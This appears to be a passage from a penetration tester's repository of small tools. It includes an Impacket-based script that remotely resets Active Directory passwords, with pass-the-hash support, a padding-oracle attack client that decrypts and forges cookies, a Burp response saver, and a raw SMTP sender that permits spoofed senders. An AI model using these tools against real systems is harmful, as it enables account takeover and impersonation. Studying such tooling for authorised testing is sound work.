├── .gitignore ├── LICENSE ├── README.md ├── activedirectory └── smbresetpasswd.py ├── burp_extensions └── saver.py ├── clients ├── requests_padbuster.py ├── smtp_sender.py └── tcp_sender.py ├── commands └── all_strings.sh ├── containerd ├── README.md ├── basecontainerspec.json ├── echoer.py ├── http2_socket_client.py ├── protobuf_parser.py └── socket_grpc_mitm_server.py ├── example_code ├── crypto_helpers.py ├── ddlmb.c ├── django_audit_snippets.py ├── dll.c ├── dll_with_proxies.c ├── getControllers.cs └── python_jwt_code.py ├── exploits └── phpinfo_lfi.py ├── helper_servers ├── dns.py ├── flask_upload.py ├── ftp-xxe.py ├── ftp-xxe3.py ├── http_capture_server.py ├── http_forwarder.py ├── http_put_server.py ├── smtp_receiver.py ├── sqlmap_secondorder_helper_server.py ├── xxe_http.py └── xxe_http_ftpfwd.py ├── payload_creators └── badpickle.py ├── presentations ├── AD_enumeration_with_LDAP_bsides-bonus_detection.pdf └── ActiveDirectoryLDAPEnumeration_public.pdf ├── setup_scripts └── c2_setup.sh └── utilities ├── appportscan.py ├── basic_kerberos_auth.py ├── cert_checker.py ├── clone_cert.py ├── create_eks_auth_token.py ├── create_kubeconfig.sh ├── git_analysis.py ├── jenkins-decrypt.py ├── kubernetes_api_enumerator.py ├── ssh_bruteforcer.py ├── ssh_cert_utilities.py └── sso-helpers.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | 49 | # Translations 50 | *.mo 51 | *.pot 52 | 53 | # Django stuff: 54 | *.log 55 | local_settings.py 56 | 57 | # Flask stuff: 58 | instance/ 59 | .webassets-cache 60 | 61 | # Scrapy stuff: 62 | .scrapy 63 | 64 | # Sphinx documentation 65 | docs/_build/ 66 | 67 | # PyBuilder 68 | target/ 69 | 70 | # Jupyter Notebook 71 | .ipynb_checkpoints 72 | 73 | # pyenv 74 | .python-version 75 | 76 | # celery beat schedule file 77 | celerybeat-schedule 78 | 79 | # SageMath parsed files 80 | *.sage.py 81 | 82 | # dotenv 83 | .env 84 | 85 | # virtualenv 86 | .venv 87 | venv/ 88 | ENV/ 89 | 90 | # Spyder project settings 91 | .spyderproject 92 | .spyproject 93 | 94 | # Rope project settings 95 | .ropeproject 96 | 97 | # mkdocs documentation 98 | /site 99 | 100 | # mypy 101 | .mypy_cache/ 102 | 103 | .DS_Store 104 | activedirectory/*.json 105 | *.dll 106 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, Stephen Bradshaw 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Stephen's Random Pentesting Stuff 2 | 3 | A place to store my various pentesting related code thats too small/niche to justify its own repository, and a simple website with notes on pentesting. 4 | -------------------------------------------------------------------------------- /activedirectory/smbresetpasswd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Impacket - Collection of Python classes for working with network protocols. 3 | # 4 | # SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved. 5 | # 6 | # This software is provided under a slightly modified version 7 | # of the Apache Software License. See the accompanying LICENSE file 8 | # for more information. 9 | # 10 | # Description: 11 | # This script allows the password for a user to be reset remotely over 12 | # SMB (MSRPC-SAMR) by another account with appropriate privileges. 13 | # It supports reseting of the password value to an NTLM hash as well as 14 | # a plaintext password. If the password is changed via specifying the 15 | # NTLM hash, kerberos keys for the target user will no longer be stored 16 | # in the account. 17 | # 18 | # Examples: 19 | # smbresetpasswd.py contoso.local/administrator@DC1 -resetuser j.doe -newpass 'Passw0rd1!' 20 | # smbresetpasswd.py contoso.local/administrator@DC1 -hashes :2788f309aad0b3f06fdec31587b24ea6 -resetuser j.doe -newpass 'Passw0rd1!' 21 | # smbresetpasswd.py contoso.local/administrator:'AdminPass'@DC1 -resetuser j.doe -newhashes :b2bdbe60565b677dfb133866722317fd -dc-ip 192.168.1.1 22 | # 23 | # Author: 24 | # @stephenbradshaw 25 | # 26 | # References: 27 | # https://malicious.link/post/2017/reset-ad-user-password-with-linux/ 28 | # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/50d17755-c6b8-40bd-8cac-bd6cfa31adf2 29 | # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/1d2be36a-754e-46b1-8697-d8aaa62bc450 30 | # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/23f9ef4c-cf3e-4330-9287-ea4799b03201 31 | # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/99ee9f39-43e8-4bba-ac3a-82e0c0e0699e 32 | # https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/cc325729(v=vs.85) 33 | # https://github.com/samba-team/samba/blob/e742661bd2507d39dfa47e40531dc1dca636cbbe/python/samba/tests/dcerpc/samr_change_password.py 34 | # 35 | 36 | from impacket import version 37 | from impacket.examples import logger 38 | from impacket.examples.utils import parse_target 39 | from impacket.dcerpc.v5 import transport, samr 40 | from impacket.crypto import SamEncryptNTLMHash 41 | from Cryptodome.Cipher import ARC4 42 | from Cryptodome.Random import get_random_bytes 43 | from binascii import unhexlify 44 | import argparse 45 | import sys 46 | import logging 47 | 48 | 49 | class SamrResetPassword(): 50 | 51 | def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, port=445, dc_ip=None): 52 | self.__username = username 53 | self.__password = password 54 | self.__domain = domain 55 | self.__lmhash = '' 56 | self.__nthash = '' 57 | self.__aesKey = aesKey 58 | self.__doKerberos = doKerberos 59 | self.__kdcHost = dc_ip 60 | self.__port = port 61 | if hashes is not None: 62 | self.__lmhash, self.__nthash = hashes.split(':') 63 | 64 | if self.__kdcHost is not None: 65 | domainController = self.__kdcHost 66 | elif self.__domain != '': 67 | domainController = self.__domain 68 | else: 69 | print('\nAn exception occurred during an attempt to connect to a domain controlled:\n\nA domain value is required!') 70 | sys.exit(1) 71 | 72 | logging.info('Creating authenticated SMB connection to domain controller {}'.format(domainController)) 73 | try: 74 | self.rpctransport = transport.SMBTransport(domainController, self.__port, r'\samr', self.__username, self.__password, 75 | self.__domain, self.__lmhash, self.__nthash, self.__aesKey, 76 | doKerberos=self.__doKerberos, kdcHost = self.__kdcHost) 77 | 78 | self.dce = self.rpctransport.get_dce_rpc() 79 | self.dce.connect() 80 | logging.info('Authentication succeeded to domain controller {}!'.format(domainController)) 81 | self.dce.bind(samr.MSRPC_UUID_SAMR) 82 | self.sessionKey = self.dce.get_rpc_transport().get_smb_connection().getSessionKey() 83 | except Exception as e: 84 | print('\nAn exception occurred during an attempt to create an authenticated SAMR connection:\n\n{}'.format(e)) 85 | sys.exit(1) 86 | 87 | 88 | def sampr_encrypt_user_password(self, password): 89 | encoded_password = password.encode('utf-16-le') 90 | encoded_length = len(encoded_password) 91 | 92 | buffer = get_random_bytes(512-encoded_length) 93 | buffer += encoded_password 94 | buffer += encoded_length.to_bytes(4, byteorder='little') 95 | 96 | cipher = ARC4.new(self.sessionKey) 97 | 98 | pwd = samr.SAMPR_ENCRYPTED_USER_PASSWORD() 99 | pwd['Buffer'] = cipher.encrypt(buffer) 100 | return pwd 101 | 102 | 103 | def reset_password(self, user, newpassword=None, newhashes=None): 104 | if not (newpassword or newhashes): 105 | print('\nAn exception occurred during an attempt to reset the password:\n\nA new password value is required') 106 | sys.exit(1) 107 | 108 | resp = samr.hSamrConnect(self.dce) 109 | serverHandle = resp['ServerHandle'] 110 | resp = samr.hSamrEnumerateDomainsInSamServer(self.dce, serverHandle) 111 | domains = resp['Buffer']['Buffer'] 112 | domainName = domains[0]['Name'] 113 | logging.info('Identified domain {} from domain controller.'.format(domainName)) 114 | 115 | resp = samr.hSamrLookupDomainInSamServer(self.dce, serverHandle, domainName) 116 | domainSid = resp['DomainId'].formatCanonical() 117 | logging.info('SID of domain {} is {}'.format(domainName, domainSid)) 118 | 119 | resp = samr.hSamrOpenDomain(self.dce, serverHandle = serverHandle, domainId = resp['DomainId']) 120 | domainHandle = resp['DomainHandle'] 121 | 122 | if user.lower().startswith(domainSid.lower()): 123 | userRid = int(user.split('-')[-1]) 124 | logging.info('Identified user RID {} from user SID {}'.format(userRid, user)) 125 | else: 126 | resp = samr.hSamrLookupNamesInDomain(self.dce, domainHandle, [user]) 127 | userRid = resp['RelativeIds']['Element'][0]['Data'] 128 | logging.info('Identified user RID {} by name lookup for {}'.format(userRid, user)) 129 | 130 | logging.info('Requesting USER_FORCE_PASSWORD_CHANGE handle for user RID {}'.format(userRid)) 131 | request = samr.SamrOpenUser() 132 | request['DomainHandle'] = domainHandle 133 | request['DesiredAccess'] = samr.USER_FORCE_PASSWORD_CHANGE 134 | request['UserId'] = userRid 135 | 136 | try: 137 | resp = self.dce.request(request) 138 | logging.info('Obtained handle for user RID {}'.format(userRid)) 139 | except Exception as e: 140 | print('\nAn exception occurred during an attempt to create a handle for user {}:\n\n{}'.format(user, e)) 141 | sys.exit(1) 142 | 143 | request = samr.SamrSetInformationUser2() 144 | request['UserHandle'] = resp['UserHandle'] 145 | 146 | buffer = samr.SAMPR_USER_INFO_BUFFER() 147 | 148 | if newhashes: 149 | logging.info('Performing password reset by specifying new hashes (Kerberos key credentials will no longer be available)') 150 | lm, nt = newhashes.split(':') 151 | unhashable = False 152 | try: 153 | nthash = unhexlify(nt) 154 | lmhash = unhexlify(lm) 155 | except: 156 | unhashable = True 157 | if (len(nt) != 32) or unhashable or not (len(lm) == 0 or len(lm) == 32): 158 | print('\nAn error occurred when setting new password!\n\nNew password hashes were provided in incorrect format!') 159 | sys.exit(1) 160 | request['UserInformationClass'] = samr.USER_INFORMATION_CLASS.UserInternal1Information 161 | buffer['tag'] = samr.USER_INFORMATION_CLASS.UserInternal1Information 162 | buffer['Internal1']['EncryptedNtOwfPassword'] = SamEncryptNTLMHash(nthash, self.sessionKey) 163 | buffer['Internal1']['EncryptedLmOwfPassword'] = SamEncryptNTLMHash(lmhash, self.sessionKey) if lm else bytes([0]) * 16 164 | buffer['Internal1']['NtPasswordPresent'] = 1 165 | buffer['Internal1']['LmPasswordPresent'] = 1 if lm else 0 166 | buffer['Internal1']['PasswordExpired'] = 0 167 | else: 168 | logging.info('Performing password reset by specifying new password') 169 | request['UserInformationClass'] = samr.USER_INFORMATION_CLASS.UserInternal5Information 170 | buffer['tag'] = samr.USER_INFORMATION_CLASS.UserInternal5Information 171 | buffer['Internal5']['UserPassword'] = self.sampr_encrypt_user_password(newpassword) 172 | buffer['Internal5']['PasswordExpired'] = 0 173 | 174 | request['Buffer'] = buffer 175 | try: 176 | resp = self.dce.request(request) 177 | except Exception as e: 178 | print('\nAn unexpected error occurred when attempting to reset the password:\n\n{}'.format(e)) 179 | sys.exit(1) 180 | logging.info('Password reset request peformed, response code is {}'.format(resp['ErrorCode'])) 181 | return resp['ErrorCode'] 182 | 183 | 184 | if __name__ == '__main__': 185 | print(version.BANNER) 186 | 187 | parser = argparse.ArgumentParser() 188 | 189 | parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') 190 | parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') 191 | parser.add_argument('-port', type=int, default=445, action='store', help='Port to use for connection. Default is 445') 192 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') 193 | 194 | resetparametersgroup = parser.add_argument_group('reset target') 195 | 196 | resetparametersgroup.add_argument('-resetuser', action='store', required=True, help='Name or SID of user to reset password for') 197 | 198 | xgroup = resetparametersgroup.add_mutually_exclusive_group() 199 | xgroup.add_argument('-newpass', action='store', default=None, help='new SMB password') 200 | xgroup.add_argument('-newhashes', action='store', default=None, metavar = 'LMHASH:NTHASH', help='new NTLM hashes, format is LMHASH:NTHASH ') 201 | 202 | group = parser.add_argument_group('authentication') 203 | 204 | group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') 205 | group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') 206 | group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' 207 | '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ' 208 | 'ones specified in the command line') 209 | group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication ' 210 | '(128 or 256 bits)') 211 | group.add_argument('-dc-ip', action='store',metavar = "ip address", default=None, help='IP Address of the domain controller. If ' 212 | 'ommited it use the domain part (FQDN) specified in the target parameter') 213 | 214 | if len(sys.argv)==1: 215 | parser.print_help() 216 | sys.exit(1) 217 | 218 | options = parser.parse_args() 219 | 220 | logger.init(options.ts) 221 | 222 | if options.debug is True: 223 | logging.getLogger().setLevel(logging.DEBUG) 224 | logging.debug(version.getInstallationPath()) 225 | else: 226 | logging.getLogger().setLevel(logging.INFO) 227 | 228 | domain, username, password, address = parse_target(options.target) 229 | 230 | 231 | if domain is None: 232 | domain = '' 233 | 234 | if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: 235 | from getpass import getpass 236 | password = getpass("Password:") 237 | 238 | if options.aesKey is not None: 239 | options.k = True 240 | 241 | 242 | reseter = SamrResetPassword(username=username, domain=domain, hashes=options.hashes, aesKey=options.aesKey, doKerberos=options.k, port=options.port, dc_ip=options.dc_ip) 243 | result = reseter.reset_password(options.resetuser, newpassword=options.newpass, newhashes=options.newhashes) 244 | 245 | if result == 0: 246 | print('Password for user {} reset successfully!'.format(options.resetuser)) 247 | else: 248 | print('Error code {} received when attempting to reset password for user {}!'.format(result, options.resetuser)) 249 | -------------------------------------------------------------------------------- /burp_extensions/saver.py: -------------------------------------------------------------------------------- 1 | # burp extension to save page response content from the site map via a right click 2 | 3 | #burp imports 4 | from burp import IBurpExtender 5 | from burp import IContextMenuFactory 6 | 7 | #Java imports 8 | from javax.swing import JMenuItem 9 | from java.util import List,ArrayList 10 | from java.net import URL 11 | 12 | #python imports 13 | import threading 14 | import os 15 | import sys 16 | from binascii import hexlify 17 | 18 | # basedir in which to save responses 19 | baseDir = '/tmp/' 20 | siteMapRetrieve = False # try and rget response data from site map if its not in selected message 21 | 22 | 23 | class BurpExtender(IBurpExtender,IContextMenuFactory): 24 | def registerExtenderCallbacks(self,callbacks): 25 | self.callbacks = callbacks 26 | self.helpers = callbacks.getHelpers() 27 | self.callbacks.setExtensionName("Item response saver") 28 | self.callbacks.registerContextMenuFactory(self) 29 | self._createIfNotExist(baseDir) 30 | self.stdout = callbacks.getStdout() 31 | self.stderr = callbacks.getStderr() 32 | return 33 | 34 | def createMenuItems(self, IContextMenuInvocation): 35 | self.selectedMessages = IContextMenuInvocation.getSelectedMessages() 36 | menuItemList = ArrayList() 37 | menuItemList.add(JMenuItem("Save responses", actionPerformed = self.onClick)) 38 | return menuItemList 39 | 40 | def _createIfNotExist(self, dir): 41 | if not os.path.isdir(dir): 42 | os.mkdir(dir) 43 | 44 | 45 | def download(self, messages): 46 | print 'About to save {} requests to disk...'.format(len(messages)) 47 | filenames = {} 48 | try: 49 | for message in messages: 50 | srv_a = self.helpers.analyzeRequest(message) 51 | this_url = srv_a.getUrl().toString().split(":")[0] + ":" + srv_a.getUrl().toString().split(":")[1] + "/" + srv_a.getUrl().toString().split(":")[2].split("/",1)[1] 52 | responseInMessage = False 53 | if 'getResponse' in dir(message): 54 | rd = message.getResponse() 55 | if rd: 56 | ar = self.helpers.analyzeResponse(rd) 57 | bo = ar.getBodyOffset() 58 | response = self.helpers.bytesToString(rd)[bo:] 59 | 60 | if len(response) > 2: 61 | responseInMessage = True 62 | else: 63 | print 'Response content for {} could not be retrieved from selected message'.format(this_url) 64 | 65 | 66 | if siteMapRetrieve and not responseInMessage: # response not in message, try and retrieve from site map 67 | sm = self.callbacks.getSiteMap(this_url) 68 | for sme in sm: 69 | srv_b = self.helpers.analyzeRequest(sme) 70 | entry_url = srv_b.getUrl().toString().split(":")[0] + ":" + srv_b.getUrl().toString().split(":")[1] + "/" + srv_b.getUrl().toString().split(":")[2].split("/",1)[1] 71 | if this_url == entry_url: 72 | 73 | rd = sme.getResponse() 74 | if rd: 75 | ar = self.helpers.analyzeResponse(rd) 76 | bo = ar.getBodyOffset() 77 | response = self.helpers.bytesToString(rd)[bo:] 78 | 79 | if len(response) > 2: 80 | break 81 | 82 | bits = [a for a in ("/" + srv_a.getUrl().toString().split(":")[2].split("/",1)[1].split('?')[0]).split('/') if a] 83 | fn = baseDir + '/'.join(bits) 84 | od = baseDir 85 | for di in bits[:-1]: 86 | od = os.path.join(od, di) 87 | self._createIfNotExist(od) 88 | if fn in filenames: 89 | filenames[fn] += 1 90 | fn = '{}_{}'.format(fn, str(filenames[fn]-1)) 91 | else: 92 | filenames[fn] = 0 93 | open(fn, 'wb').write(response.encode('utf8')) 94 | except Exception as e: 95 | self.stderr.write('An error occurred: {}'.format(e)) 96 | 97 | 98 | print 'Saved {} requests to disk!'.format(len(messages)) 99 | 100 | 101 | def onClick(self, event): 102 | requests = self.selectedMessages 103 | 104 | t = threading.Thread(target=self.download,args=[requests]) 105 | t.daemon = True 106 | t.start() 107 | 108 | 109 | -------------------------------------------------------------------------------- /clients/requests_padbuster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from paddingoracle import BadPaddingException, PaddingOracle 3 | 4 | class RequestPadbuster(PaddingOracle): 5 | '''Instance of PaddingOracle that sets some default parameters using the requests module''' 6 | 7 | import socket 8 | import time 9 | import requests 10 | 11 | def __init__(self, **kwargs): 12 | '''Constructor with sensible requests defaults''' 13 | 14 | super(RequestPadbuster, self).__init__(**kwargs) 15 | self.session = self.requests.Session() 16 | self.wait = kwargs.get('wait', 2.0) 17 | self.session.verify = kwargs.get('verify', False) 18 | self.session.timeout = kwargs.get('timeout', 5) 19 | self.session.stream = kwargs.get('stream', False) 20 | self.session.proxies = kwargs.get('proxies', {}) 21 | self.session.headers = kwargs.get('headers', {}) 22 | self.session.allow_redirects = kwargs.get('allow_redirects', True) 23 | self.session.cookies = self.requests.utils.cookiejar_from_dict(kwargs.get('cookies', {})) 24 | self.url = kwargs.get('url', None) 25 | if not self.url: 26 | raise ValueError('No value for url provided') 27 | 28 | 29 | def doRequest(self, payload): 30 | '''Perform the padding request incorporating payload using the requests session object in self.session, return the response''' 31 | raise NotImplementedError 32 | 33 | 34 | def encode(self, input): 35 | '''Performs encoding of raw payload data to something acceptable by application, return the encoded value''' 36 | raise NotImplementedError 37 | 38 | 39 | def checkResponse(self, response): 40 | '''Check the response from the app, return True for a value indicating a padding error, False for correct padding''' 41 | raise NotImplementedError 42 | 43 | 44 | 45 | def oracle(self, data, **kwargs): 46 | '''Implementation of oracle function''' 47 | payload = self.encode(data) 48 | 49 | while 1: 50 | try: 51 | response = self.doRequest(payload) 52 | break 53 | except (self.socket.error, self.requests.exceptions.RequestException): 54 | logging.exception('Retrying request in %.2f seconds...', self.wait) 55 | self.time.sleep(self.wait) 56 | continue 57 | 58 | self.history.append(response) 59 | 60 | if self.checkResponse(response): 61 | raise BadPaddingException 62 | 63 | 64 | 65 | 66 | class PadBuster(RequestPadbuster): 67 | '''Example subclass implementation of RequestPadbuster class''' 68 | import urllib 69 | import base64 70 | 71 | def doRequest(self, payload): 72 | '''Perform the padding request incorporating payload using the requests session object in self.session, return the response''' 73 | self.session.cookies['auth'] = payload 74 | return self.session.get(self.url) 75 | 76 | def encode(self, input): 77 | '''Performs encoding of raw payload data to something acceptable by application, return the encoded value''' 78 | return self.urllib.quote(self.base64.b64encode(input)) 79 | 80 | def checkResponse(self, response): 81 | '''Check the response from the app, return True for a value indicating a padding error, False for correct padding''' 82 | return 'Invalid padding' in response.text 83 | 84 | 85 | 86 | 87 | if __name__ == '__main__': 88 | import logging 89 | from base64 import b64decode 90 | from urllib import unquote 91 | 92 | logging.basicConfig(level=logging.DEBUG) 93 | 94 | encrypt_string = 'user=admin' 95 | cookie = 'A41WLaMt2MZ87HXpVnX1l78u%2BjO0vjiU' 96 | raw_data = b64decode(unquote(cookie)) 97 | 98 | padbuster = PadBuster(url='http://192.168.33.101/index.php') 99 | 100 | #decrypted = padbuster.decrypt(raw_data, block_size=8, iv=None) 101 | #print 'Decrypted cookie: %s => %r' % (cookie, decrypted) 102 | 103 | #encrypted = padbuster.encrypt(encrypt_string, block_size=8, iv=None) 104 | #print 'New encrypted cookie for value %s => %s' %(encrypt_string, padbuster.encode(encrypted)) 105 | -------------------------------------------------------------------------------- /clients/smtp_sender.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | '''SMTP sender''' 3 | from __future__ import print_function 4 | from builtins import bytes 5 | from optparse import OptionParser 6 | from email.mime.base import MIMEBase 7 | from email.mime.multipart import MIMEMultipart 8 | from email.mime.text import MIMEText 9 | from email import utils 10 | import smtplib 11 | import os 12 | import sys 13 | import mimetypes 14 | import socket 15 | import select 16 | import random 17 | 18 | 19 | 20 | # shut up about constants pylint! 21 | # pylint: disable-msg=C0103 22 | 23 | def rnumeric(length): 24 | '''Generate a numeric string of given length''' 25 | return ''.join([str(random.randint(0, 9)) for a in range(0, length)]) 26 | 27 | 28 | def msg_id(): 29 | '''Generate a message id''' 30 | return '.'.join([rnumeric(a) for a in [12, 4, 20]]) + '@' + socket.gethostname() 31 | 32 | 33 | def detect_filetype(fn, bodyFile=False): 34 | '''Detect mime type information about a file''' 35 | ct, enc = mimetypes.guess_type(fn) 36 | if ct is None and bodyFile: 37 | fdata = open(fn, 'rb').read() 38 | ct = 'text/html' if '' in fdata else 'text/plain' 39 | else: 40 | if ct is None or enc is not None: 41 | ct = 'application/octet-stream' 42 | return ct.split('/', 1) # [maintype, subtype] 43 | 44 | 45 | def sendraw(address, sendr, recip, subj, afrom=None, nheaders=None, bheaders=None, textbody=None, data=None, debug=False): 46 | '''Send a raw email using a socket''' 47 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 48 | s.connect(address) 49 | s.setblocking(0) 50 | 51 | send_heads = [ 52 | 'mail FROM:<%s>\n' %(sendr), 53 | 'rcpt TO:<%s>\n' %(recip), 54 | 'data\n' 55 | ] 56 | 57 | if not afrom: 58 | afrom = sendr 59 | 60 | if nheaders: 61 | end = send_heads.pop() 62 | send_heads += [a + '\n' for a in nheaders] 63 | send_heads += [end] 64 | 65 | # if the data value is provided, it will need to be completely specified 66 | # otherwise it is built here from a template 67 | if not data: 68 | if not textbody: 69 | raise Exception('Need to provide textbody') 70 | if bheaders: 71 | dat2 = '\n'.join(bheaders) + '\n' 72 | else: 73 | dat2 = '' 74 | 75 | boundary = rnumeric(19) 76 | dat1 = ('Content-Type: multipart/mixed; boundary="===============%s=="\n' 77 | 'MIME-Version: 1.0\n' 78 | 'Message-ID: <%s>\n') %(boundary, msg_id()) 79 | 80 | dat3 = ('Subject: %s\n' 81 | 'from: %s\n' 82 | 'To: %s\n' 83 | '\n' 84 | '%s\n' 85 | '--===============%s==\n' 86 | '\n' 87 | '--===============%s==--\n' 88 | ) %(subj, afrom, recip, textbody, boundary, boundary) 89 | data = dat1 + dat2 + dat3 90 | 91 | check_receive = True 92 | sent_main = False 93 | 94 | while check_receive: 95 | ready = select.select([s], [], [], 5) 96 | if ready[0]: 97 | received = s.recv(4096) 98 | 99 | if debug: 100 | print('R: ' + received) 101 | 102 | if received.startswith(b'220'): 103 | val = b'ehlo [127.0.0.1]\n' 104 | s.send(val) 105 | if debug: 106 | print('S: ' + val) 107 | elif received.startswith(b'250 OK') or b'250 HELP' in received or received.startswith(b'500'): 108 | if send_heads: 109 | val = bytes(send_heads.pop(0), 'ascii') 110 | s.send(val) 111 | if debug: 112 | print('S: ' + val) 113 | elif sent_main: 114 | val = b'quit\n' 115 | s.send(val) 116 | if debug: 117 | print('S: ' + val) 118 | check_receive = False 119 | ready = select.select([s], [], [], 5) 120 | if ready[0]: 121 | received = s.recv(4096) 122 | if debug: 123 | print('R: ' + received) 124 | 125 | elif received.startswith(b'354'): 126 | val = bytes(data + '\r\n.\r\n', 'ascii') 127 | s.send(val) 128 | if debug: 129 | print('S: ' + val) 130 | sent_main = True 131 | elif received.startswith(b'250'): 132 | if debug: 133 | print('R: ' + received) 134 | else: 135 | raise Exception('Unexpected response from server: ' + received) 136 | 137 | s.close() 138 | 139 | 140 | if __name__ == '__main__': 141 | parser = OptionParser(usage='%prog [options]') 142 | parser.add_option('-d', '--debug', dest='debug', 143 | action='store_true', help='show debugging messages') 144 | parser.add_option('-s', '--subject', dest='subject', help='email subject [required]') 145 | parser.add_option('-f', '--from', dest='sender', help='email from address [required]') 146 | parser.add_option('-b', '--body', dest='body', help='email body') 147 | parser.add_option('-t', '--bodyfile', dest='bodyfile', help='email body from file') 148 | parser.add_option('-z', '--host', dest='host', help='SMTP host [required]') 149 | parser.add_option('-p', '--port', dest='port', type='int', help='SMTP port [required]') 150 | #parser.add_option('-e', '--base64', dest='b64', action='store_true', 151 | # help='Base64 encoding (default)') 152 | parser.add_option('-g', '--afrom', dest='asender', help='email body from') 153 | parser.add_option('-o', '--bodyencode', dest='bodyencode', 154 | action='store_true', help='Use selected encoder to encode body content') 155 | parser.add_option('-r', '--recipients', 156 | dest='recipients', 157 | help='comma separated list of email recipients [required]') 158 | parser.add_option('-a', '--attachments', 159 | dest='attachments', 160 | help='comma separated list of email attachments') 161 | parser.add_option('-j', '--smtpheaders', 162 | dest='smtpheaders', 163 | help='comma separated list of smtp headers') 164 | parser.add_option('-k', '--bodyheaders', 165 | dest='bodyheaders', 166 | help='comma separated list of body headers') 167 | parser.add_option('-i', '--binary', dest='binary', 168 | help='Dont detect attachment filetype, send binary') 169 | parser.add_option('-w', '--raw', dest='raw', action='store_true', 170 | help='Send the SMTP message using a raw socket to allow greater manipulation') 171 | opts, args = parser.parse_args() 172 | 173 | if not opts.sender or not opts.subject: 174 | print('Required options missing - you must specify values for -f/--from and /s/--subject') 175 | sys.exit(1) 176 | 177 | try: 178 | recipients = opts.recipients.replace(' ', '').split(',') 179 | subject = opts.subject 180 | sender = opts.sender 181 | to = ', '.join(recipients) 182 | 183 | host = opts.host 184 | port = int(opts.port) 185 | 186 | except (ValueError, NameError, IndexError, AttributeError, TypeError): 187 | print('Required options missing') 188 | print(parser.format_help()) 189 | sys.exit(1) 190 | 191 | if opts.asender: 192 | alt_sender = opts.asender 193 | else: 194 | alt_sender = None 195 | 196 | if opts.bodyfile: 197 | if os.path.exists(opts.bodyfile): 198 | fd = open(opts.bodyfile, 'rb').read() 199 | body=None 200 | else: 201 | print('Provided body file does not exist') 202 | sys.exit(1) 203 | elif opts.body: 204 | fd = None 205 | body = opts.body 206 | else: 207 | print('Provide either body text or body file') 208 | print(parser.format_help()) 209 | sys.exit(1) 210 | 211 | if opts.bodyheaders: 212 | bodyheaders = opts.bodyheaders.replace(', ', ',').split(',') 213 | if opts.bodyfile: 214 | print('Cannot specify both bodyfile and bodyheaders options') 215 | sys.exit(1) 216 | if not opts.raw: 217 | print('Bodyheaders option requires raw option to be enabled') 218 | sys.exit(1) 219 | else: 220 | bodyheaders = None 221 | 222 | if opts.smtpheaders: 223 | smtpheaders = opts.smtpheaders.replace(', ', ',').split(',') 224 | if not opts.raw: 225 | print('Smtpheaders option requires raw option to be enabled') 226 | sys.exit(1) 227 | else: 228 | smtpheaders = None 229 | 230 | 231 